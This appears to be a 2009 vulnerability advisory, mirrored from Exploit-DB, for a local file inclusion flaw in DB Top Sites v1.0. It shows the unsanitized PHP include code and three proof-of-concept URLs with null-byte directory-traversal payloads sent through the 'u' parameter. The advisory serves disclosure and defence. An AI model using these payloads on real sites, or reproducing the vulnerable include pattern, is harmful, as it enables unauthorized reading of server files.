DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability

vendor:

DB Top Sites

by:

SirGod

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: DB Top Sites

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'u' parameter to 'index.php', 'full.php' and 'contact.php' scripts. This can be exploited to include arbitrary files from local resources via directory traversal attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.

Source

Exploit-DB raw data:

######################################################################
[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
[+] Discovered By SirGod 
[+] www.mortal-team.org
#######################################################################

[+] Local File Inclusion

 - Vulnerable code is everywhere

-------------------------------------------------------------------------------------------------------
if ( $u != "" ) {

if ( file_exists( "./sites/session/$u.session.php" ) ){
include "./sites/session/$u.session.php";
include "./sites/$u.php";
-------------------------------------------------------------------------------------------------------

- PoC's

    http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00


#######################################################################

# milw0rm.com [2009-06-15]